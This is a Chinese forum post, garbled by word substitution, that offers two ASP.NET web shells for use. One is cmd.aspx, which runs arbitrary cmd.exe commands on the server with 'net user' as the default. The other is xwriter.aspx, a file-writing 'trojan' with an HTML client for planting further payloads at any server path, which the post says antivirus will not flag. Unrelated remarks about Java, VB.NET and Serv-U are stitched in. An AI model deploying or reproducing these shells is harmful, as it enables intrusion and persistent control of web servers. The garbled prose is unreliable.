|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
就安全性而言,Java已经远远低于VB.NET,更无法与安全性著称的C#相比。asp.net|程序 1、cmd.aspx
在罪恶八进制论坛(PS:有谁晓得为何比来几天这论坛打不开啊)有伴侣提出WebAdmin实行命令不克不及带参数的成绩,偶找了个BT主机来尝尝,公然有成绩,就把之前谁人cmd.aspx改了改,就请对付着用先。WebAdmin2.X的下个版本将修复这个成绩.
把一下代码复制保留为一.aspx文件便可:
<%@PageLanguage="VB"Debug="true"%><%@importNamespace="system.IO"%><%@importNamespace="System.Diagnostics"%><scriptrunat="server">
SubRunCmd(SrcAsObject,EAsEventArgs)
DimmyProcessAsNewProcess()
DimmyProcessStartInfoAsNewProcessStartInfo(xpath.Text)myProcessStartInfo.UseShellExecute=FalsemyProcessStartInfo.RedirectStandardOutput=true
myProcess.StartInfo=myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
DimmyStreamReaderAsStreamReader=myProcess.StandardOutput
DimmyStringAsString=myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text=vbcrlf&"<pre>"&mystring&"</pre>"
EndSub
</script>
<html>
<head>
<title>ASP.NETShellforWebAdmin2.XFinal</title>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312"/>
</head>
<body>
<formrunat="server">
<asp:Labelid="L_p"style="COLOR:#0000ff"runat="server"width="80px">Program</asp:Label>
<asp:TextBoxid="xpath"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px">c:windowssystem32cmd.exe</asp:TextBox>
<br/>
<asp:Labelid="L_a"style="COLOR:#0000ff"runat="server"width="80px">Arguments</asp:Label>
<asp:TextBoxid="xcmd"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;BORDER-BOTTOM:#084b8e1pxsolid"runat="server"Width="300px"Text="/cnetuser">/cnetuser</asp:TextBox>
<br/>
<asp:Buttonid="Button"style="BORDER-RIGHT:#084b8e1pxsolid;BORDER-TOP:#084b8e1pxsolid;BORDER-LEFT:#084b8e1pxsolid;COLOR:#ffffff;BORDER-BOTTOM:#084b8e1pxsolid;BACKGROUND-COLOR:#719bc5"runat="server"Width="100px"Text="Run"></asp:Button>
<p>
<asp:Labelid="result"style="COLOR:#0000ff"runat="server"></asp:Label>
</p>
</form>
</body>
</html>
2、xwriter.aspx
记得有个ASP下的小马就是使用FSO把提交的文本信息保留为一个文件,固然体积比eval年夜些可是代码完整正当,杀毒软件也不会找茬的。呵呵,以下代码就是在ASP.NET完成这功效(本人拿往改改还能够拔出ASPX文件哦):
<%@PageLanguage="VB"%>
<%@importNamespace="System.IO"%>
<scriptrunat="server">
SubPage_load(senderAsObject,EAsEventArgs)
dimmywriteasnewstreamwriter(request.form("path"),true,encoding.default)mywrite.write(request.form("content"))
mywrite.close
response.write("Done!")EndSub
</script>
以下是客户端,复制上去保留为htm文件:
<!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
<title>XWriter.NETbylake2</title>
</head>
<body>
<formname="form1"method="post">
<divalign="center">URL:
<inputname="url"type="text"value="http://www.xxx.com/a.aspx"size="60">
<br>
Path:
<inputname="path"type="text"id="path"value="e:mywebmyowna.txt"size="60">
<br>
<textareaname=contentcols=120rows=10id="content"width=45>填进天生木马的内容,最好是全英文</textarea>
<BR>
<center>
<br>
<inputtype=submitvalue=提交>
<br>
EnjoyHacking!!!!!!</div>
</body></html>
<scriptlanguage="javascript">
functionTwoSubmit(form1){
varurl=document.form1.url.value;
form1.action=url;
form1.submit();
}
</script>
我以前很喜欢Serv-U,自从它用Java重写之后我就再也没用过,实在是太慢了,我宁可用IIS搭建FTP,虽然IIS搭建FTP在权限管理上很不灵活。 |
|